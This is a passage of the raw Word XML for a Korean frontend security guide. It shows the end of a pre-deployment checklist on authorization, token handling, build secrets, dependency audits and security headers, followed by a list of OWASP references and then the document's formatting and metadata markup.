      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  권한이 필요한 모든 기능에 서버 401/403 규칙이 있다(UI 숨김만으로 끝난 기능이 없다).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  로그아웃 시 토큰·store가 모두 초기화</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>되고 서버에서 refreshToken이 폐기된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>빌드 · 의존성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  VITE_* 환경변수에 비밀이 없고 .env.local은 커밋되지 않았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  운영 빌드에 소스맵·디버그 코드·테스트 계정 안내가 없다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  npm ci로 설치했고 npm audit에 해결되지 않은 high/critical이 없다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>배포</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  HTTPS로만 서비스하고 HSTS가 설정되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  CSP, X-Content-Type-Options, Referrer-Policy, frame-ancestors가 설정되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  서버 CORS 허용 Origin에 운영 도메인만 있다(localhost 제거).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00AB5589">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>9. 관련 문서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9C2A1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docs/API_SPEC.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 이 앱이 호출하는 API 계약, 권한/소유권 표, 테스트 계정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9C2A1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Student_JWT/docs/security/01~10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 백엔드 관점의 OWASP Top 10 실습(SQLi, IDOR, 공급망, 로깅, CSRF, JWT, XSS, 역직렬화, 보안설정오류, 브루트포스)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t>OWASP Top 10:2025 — https://owasp.org/Top10/2025/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lastRenderedPageBreak/>
        <w:t>OWASP Top 10:2021 (이전 판 — 번호 비교용) — https://owasp.org/Top10/2021/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t>OWASP Cheat Sheet Series — https://cheatsheetseries.owasp.org/ (Cross Site Scripting Prevention, Content Security Policy, HTML5 Security, Unvalidated Redirects and Forwards, JSON Web Token)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP ASVS (Application Security Verification Standard) — https://owasp.org/www-project-application-security-verification-standard/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EC19AC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5CF" w:rsidRDefault="003035CF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003035CF" w:rsidRDefault="0030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F71" w:rsidRDefault="003A7F71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F6079">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>19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5CF" w:rsidRDefault="003035CF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003035CF" w:rsidRDefault="00303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86877"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0305040"/>
    <w:lvl w:ilvl="0" w:tplc="0E8EBEF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B854FB00">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EDB6FB96">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6A28DF3E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="05C83652">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="51F0C79A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F3360F36">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E2243062">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7E9EEC62">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11CB40CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="802A46AC"/>
    <w:lvl w:ilvl="0" w:tplc="93FA4F78">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40C2CC20">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="67B86358">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7B5E3064">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C95C827A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="236C492A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="22F0C740">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="76F2AF2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EB3C00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B616C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD4EE442"/>
    <w:lvl w:ilvl="0" w:tplc="414E9DD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DFFA1030">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4024FE1A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E848A8C0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4AFC14CA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CA3A9AFA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="010A5686">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C7208FC6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1E701732">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="20A35313"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FFECA4E"/>
    <w:lvl w:ilvl="0" w:tplc="90D6D600">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="57245244">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8A184920">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A1A4ACE2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E7425FE4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04DA8762">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5B7AC56A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0AAA7600">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="44D06730">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="57F63E42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B309C54"/>
    <w:lvl w:ilvl="0" w:tplc="CF8CA74A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 w:tplc="671868AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1200" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FA8C7480">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B7525E6E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F8683892">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="890050C8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6FEC3E62">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A1C6C04C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BE4CDF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AC"/>
    <w:rsid w:val="0001485C"/>
    <w:rsid w:val="00142BF7"/>
    <w:rsid w:val="00275A50"/>
    <w:rsid w:val="00283F99"/>
    <w:rsid w:val="002A77F2"/>
    <w:rsid w:val="003035CF"/>
    <w:rsid w:val="003329F3"/>
    <w:rsid w:val="003771C3"/>
    <w:rsid w:val="003A44F6"/>
    <w:rsid w:val="003A7F71"/>
    <w:rsid w:val="00455198"/>
    <w:rsid w:val="005120DE"/>
    <w:rsid w:val="00595F5C"/>
    <w:rsid w:val="005B443A"/>
    <w:rsid w:val="005B5DAF"/>
    <w:rsid w:val="007627C4"/>
    <w:rsid w:val="008A4771"/>
    <w:rsid w:val="008C3E11"/>
    <w:rsid w:val="00A9602B"/>
    <w:rsid w:val="00AB5589"/>
    <w:rsid w:val="00B3444E"/>
    <w:rsid w:val="00BB447D"/>
    <w:rsid w:val="00C312AA"/>
    <w:rsid w:val="00C40E4F"/>
    <w:rsid w:val="00C4572E"/>
    <w:rsid w:val="00CA1CCE"/>
    <w:rsid w:val="00D24C75"/>
    <w:rsid w:val="00D80409"/>
    <w:rsid w:val="00DB3C6E"/>
    <w:rsid w:val="00DF46B3"/>
    <w:rsid w:val="00DF7158"/>
    <w:rsid w:val="00EB28D7"/>
    <w:rsid w:val="00EC19AC"/>
    <w:rsid w:val="00EE6922"/>
    <w:rsid w:val="00EF6079"/>
    <w:rsid w:val="00FE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DF6F"/>
  <w15:docId w15:val="{B78D65BA-C63C-43C6-9E6A-FDBE50EA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keepNext/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keepNext/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keepNext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21</Pages>
  <Words>3204</Words>
  <Characters>18268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00. 프론트엔드 보안 가이드</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>21430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00. 프론트엔드 보안 가이드</dc:title>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>백 명숙</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-18T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-19T18:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>